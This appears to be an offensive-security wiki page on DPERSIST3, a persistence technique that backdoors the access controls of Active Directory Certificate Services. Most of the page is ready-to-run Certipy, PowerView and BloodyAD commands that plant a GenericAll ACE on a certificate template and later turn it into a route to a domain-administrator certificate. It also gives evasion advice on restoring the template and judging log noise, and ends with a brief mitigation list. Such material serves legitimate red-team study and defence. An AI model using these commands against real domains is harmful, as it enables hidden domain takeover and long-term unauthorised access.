dpersist3-malicious-misconfiguration-acl-backdoor.md (4495B)
1 --- 2 title: "DPERSIST3 — Malicious Misconfiguration (ACL Backdoor)" 3 description: "Instead of forging certs now, DPERSIST3 backdoors the PKI ACLs so you can re-escalate whenever you like. You grant an attacker-controlled principal…" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "adcs", "delegation", "privilege-escalation", "persistence"] 7 tools: ["Certipy", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/DPERSIST3 — Malicious Misconfiguration (ACL Backdoor).md" 11 --- 12 # DPERSIST3 — Malicious Misconfiguration (ACL Backdoor) 13 14 ## Quick Reference 15 16 | Field | Value | 17 |-------|-------| 18 | **Category** | Domain Persistence (ACL) | 19 | **Difficulty** | Medium–High | 20 | **Pre-requisites** | Write/Owner over PKI AD objects (CA object, templates, Enrollment Services, NTAuth) — typically post-DA | 21 | **Tools** | PowerView, BloodyAD, Certipy, dacledit | 22 | **OPSEC Noise** | Low after the fact — a dormant ACE that looks like normal delegation | 23 | **One-liner** | Plant permissive ACEs on ADCS objects so a principal you control can re-create an ESC condition on demand, giving quiet, reusable domain persistence. | 24 25 *** 26 27 ## What Is DPERSIST3? 28 29 Instead of forging certs now, DPERSIST3 **backdoors the PKI ACLs** so you can re-escalate whenever you like. You grant an attacker-controlled principal write/control over a template, the CA object, the Enrollment Services container, or `NTAuthCertificates`. Later, from any low-priv-looking account, you flip a template into an ESC4/ESC1 state (or push a rogue CA per DPERSIST2) and mint privileged certs. The backdoor is a single dormant ACE that blends into legitimate delegation. 30 31 *** 32 33 ## Step 1 — Identify the Object to Backdoor 34 35 ```bash 36 # Enumerate PKI objects + current DACLs 37 certipy-ad find -u admin -p pass -dc-ip $TARGET -stdout 38 ``` 39 40 Good targets (in `CN=Public Key Services,CN=Services,CN=Configuration,DC=...`): 41 42 | Object | Backdoor effect | 43 | :-- | :-- | 44 | A certificate template | Grant Write → recreate ESC1/ESC4 on demand | 45 | `CN=Certificate Templates` container | Create/clone new vulnerable templates | 46 | The Enterprise CA object | Grant ManageCA → ESC7-style control | 47 | `NTAuthCertificates` | Grant Write → publish rogue CA (DPERSIST2) | 48 49 *** 50 51 ## Step 2 — Plant the ACE 52 53 ```powershell 54 # PowerView — give a controlled user GenericAll over a template 55 Add-DomainObjectAcl -TargetIdentity "CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=htb" ` 56 -PrincipalIdentity 'lowpriv' -Rights All 57 ``` 58 59 ```bash 60 # BloodyAD equivalent 61 bloodyAD -u admin -p pass -d domain.htb --host $TARGET \ 62 add genericAll 'CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=htb' lowpriv 63 ``` 64 65 *** 66 67 ## Step 3 — Re-Escalate On Demand (later) 68 69 ```bash 70 # From the backdoored low-priv account, flip the template to ESC1 and request a DA cert 71 certipy-ad template -u lowpriv -p pass -template User -write-default-configuration ... # make it vulnerable 72 certipy-ad req -u lowpriv -p pass -ca 'DOMAIN-CA' -template User -upn administrator@domain.htb 73 certipy-ad auth -pfx administrator.pfx -dc-ip $TARGET 74 ``` 75 76 > [!tip] Pair with template restore 77 > Some operators flip the template vulnerable, request, then restore the original config to minimise the window a defender could catch it in a config diff. 78 79 *** 80 81 ## OPSEC Considerations 82 83 | Action | Log | Noise | 84 | :-- | :-- | :-- | 85 | Planting the ACE | AD object write (4662/5136) | 🟡 Medium (at plant time) | 86 | Dormant backdoor | none | 🟢 Low | 87 | On-demand re-escalation | template change + 4886/4887 | 🟡 Medium | 88 89 *** 90 91 ## Mitigation 92 93 - Baseline and monitor DACLs on **all** PKI objects; alert on new write/control ACEs. 94 - Restrict who can modify templates and the Enrollment Services / NTAuth containers. 95 - Use SACLs (Event 4662/5136) on the PKI config container to catch ACE additions. 96 - After a DA-level incident, audit ADCS ACLs for planted backdoors, not just user/group membership. 97 98 *** 99 100 ## See Also 101 102 - _ADCS Attack Methodology Guide · ESC4 — Vulnerable Certificate Template Access Control · ESC5 — Vulnerable PKI Object Access Control · ESC7 — Vulnerable CA Access Control (ManageCA ManageCertificates) · DPERSIST2 — Rogue CA Certificate (NTAuth Injection) 103 - Sources: SpecterOps *Certified Pre-Owned*; [The Hacker Recipes — ADCS](https://www.thehacker.recipes/ad/movement/ad-cs/)